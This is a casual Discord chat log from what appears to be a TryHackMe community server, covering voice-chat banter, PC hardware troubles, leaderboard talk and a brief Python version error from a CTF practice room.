Thereโ€™s many not there ;)

full sapphire
#

@plucky vault @manic canyon Servers over a certain size don't show offline members -- they just disappear.
There are 9 mods, 3 admins. Skidy and Ashu came up with the idea, Dark was brought on from being a user originally. I don't believe Dark is involved in the Dev side of things -- he deals with the community and content direction.

#

Quick rundown for ya

manic canyon
#

I know how it works but thanks Muir ๐Ÿ˜‚ <3

#

But the history of THM is interesting

full sapphire
#

That bit was for rabbit ๐Ÿ˜†

#

Just easier to tag you both in one message, than write out one each ๐Ÿคทโ€โ™‚๏ธ

manic canyon
#

Yee

plucky vault
#

Does that size increase by the number of Nicro Boosters?

#

Nitro//

manic canyon
#

No itโ€™s just members of the server

plucky vault
#

Come hang out on general voice channel! ๐Ÿ™‚

lofty moat
#

@plucky vault no ones there

#

its just you all alone

#

i am hiding in the corner

#

i can hear you xD

plucky vault
#

You're not talking in Oreo byte!

lofty moat
#

i don't usually talk

#

and its also kinda loud in the background

plucky vault
#

Ah okay.

#

I'm trying to setup my virtual machine to have the same network as my host operating system but virtualbox is being a pain.

#

Alright, let's go back to Oreobyte then.

#

Are you there naughty?

lofty moat
#

yeah?

#

playing koth

plucky vault
#

Ah ok. No rroom?

#

๐Ÿ˜ฆ

rare solstice
#

@plucky vault glhf

plucky vault
#

Thanks Rasit.

#

Sorry Discord is eating my CPU like a hog.

worldly pike
#

lol

mental raptor
#

@tame ether kurwa

tame ether
#

๐Ÿ‘€

worldly pike
#

yea

#

he gotta flag ๐Ÿ‘€

#

nice

#

6 flags @tame ether ๐Ÿ‘€

fathom coyote
#

@midnight fern get on vc loser

full sapphire
#

๐Ÿคฃ

tame ether
#

lmao

lofty moat
#

He is in vc but you can't see him

fathom coyote
#

Dude yeah I literally replaced my ram and it instantly BSOD'd

full sapphire
#

Uh...

fathom coyote
#

Yeeeep

full sapphire
#

๐Ÿค” Marginally confused

fathom coyote
#

At this point I'm actually about to return the RAM and get a mobo replacement

tame ether
#

yikes

fathom coyote
#

I've been having long-standing issues with my PC so I replaced my RAM after using a backup set. Had no issues.

#

Figured "must be the ram" buy a replacement set today, instant BSOD

full sapphire
#

Ahh, that makes sense

#

Ouch

tame ether
#

i returned my ssd because it made my pc bsod by apparently it was fixable with a bios update

fathom coyote
#

Last time I updated the BIOS on my mobo it bricked it so at this point I think Asus ROG makes dogshit and the only reason they get good reviews is because they have an army of sponsored fanboys

#

Definitely never getting an Asus ROG board again

#

0day is rude.

tame ether
#

0day is busy

#

he just got a call

fathom coyote
#

He wanted the VC party to start

tame ether
#

little did he know, the vc party already started

fathom coyote
#

VC party is over

#

I was going to live-build the home theatre pc

tame ether
#

:0

#

now i'm sad that i missed that

fathom coyote
#

I mean I can still do it

#

I'm trying to get the drivers I need dumped on a USB so I don't have to have it all cabled up

lofty moat
#

Wrong Chat

plucky vault
#

sad

lofty moat
#

@full jewel you playing rn?

#

pakistan @foggy canyon

#

how can i help you

#

i just use sublime text or cherry tree

full jewel
#

@lofty moat sry didnt saw you there :D
in a couple ill start

lofty moat
#

Nah nvrmnd.. my electricity went off. Except for rooting carnage not much luck in koth today. Just getting food and shrek continuously and also electricity problems

full jewel
#

๐Ÿ˜ฆ

plucky vault
#

outages are bad

#

aghh crap my nickname didn't change

shadow pier
#

hello i have a question

#

this is ok??

#
Traceback (most recent call last):
  File "crack_this.py", line 6, in <module>
    print(bytes.fromhex(a).decode('utf-8'))
AttributeError: type object 'str' has no attribute 'fromhex'
#

the machine is CTF collection vol 1

limber lichen
#

Also this looks like a version error. Try with python2 / python3

shadow pier
#

Also this looks like a version error. Try with python2 / python3
@limber lichen thanks

frosty depot
#

Hey! Can I join the voice chat? Are you talking about any room in particular?

tame ether
#

not right now

#

but you are free to join

full sapphire
#

It's a fun one @midnight fern

#

No, genuinely fun

#

Nah, it is easy

#

And a lot more realistic than your typical CTF

#

Kinda

frosty depot
#

My english is not good

#

I know 0day is the best

midnight fern
#

I know 0day is the best
@frosty depot Lolol

frosty depot
#

You said so

midnight fern
#

Not according to leaderboards ๐Ÿ˜ฆ

#

@tame ether is #1

tame ether
#

i'm not

frosty depot
#

I'm #3886

full sapphire
#

Ryan!

#

That is disgusting

frosty depot
#

Hahahaaha

full sapphire
#

Also, why are you training children to swear for you @midnight fern

cursive herald
#

they take like 1 year breaks lmao

#

thats great

tame ether
#

yeah